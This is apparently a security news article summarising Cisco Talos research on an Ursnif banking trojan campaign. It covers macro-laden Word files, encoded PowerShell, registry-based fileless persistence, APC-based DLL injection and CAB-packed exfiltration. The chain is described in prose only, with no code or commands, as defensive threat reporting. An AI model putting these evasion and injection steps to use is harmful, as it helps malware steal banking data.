- New Ursnif banking trojan campaign uses PowerShell to achieve fileless persistence to avoid detection.
- The new campaign was discovered by security researchers at Cisco Talos.
- The attackers use malicious Microsoft Word document containing a malicious VBA macro to spread the malware
Security researchers have discovered a new Ursnif malware campaign using PowerShell to avoid detection.
The new campaign was discovered by security researchers at Cisco Talos and said that the attacker uses PowerShell to achieve fileless persistence to avoid detection of anti-malware solutions.
The attackers use malicious Microsoft Word document containing a malicious VBA macro to deliver the malware.
If the macros are already allowed it will be executed automatically using AutoOpen function or else the document will display an image asking the users to enable macros.
The macro is designed to execute the next infection stage by accessing the AlternativeText property of the Shapes object “j6h1cf.”
“The value of this property is the malicious PowerShell command, which is subsequently executed by the Shell function. The PowerShell command is base64 encoded, and is another PowerShell command that downloads Ursnif. “
After the Ursnif is executed, a registry data is created containing the commands for the next stage of execution.
The next command uses Windows Management Instrumentation Command-line (WMIC) to execute PowerShell which will extract the value of the Authicap key to execute it.
The injection process starts by allocating memory for the malicious DLL with VirtualAllocEx by targeting the current process. After that, it copies he malicious DLL into the newly allocated memory with Copy.
In the next process, QueueUserAPC is executed, and a user-mode APC is created and queues it within the thread.
“To execute the malicious DLL from the APC queue, the thread needs to enter an alertable state. SleepEx is used to trigger an alertable state completing the APC injection, by specifying 1 (True) for its second parameter which is bAlertable.” said in the blog post published by researchers.
Once the infection process is completed C2 requests are made via HTTPS. The researchers were able to intercept the traffic and discovered that data were made it into a CAB file format before exfiltration.
For more details and indicators of compromise (IOC), you can visit the analysis by Cisco Talos researchers here.
You may be interested in reading:Blur Data Breach Potentially Exposed Data of 2.4 Million Users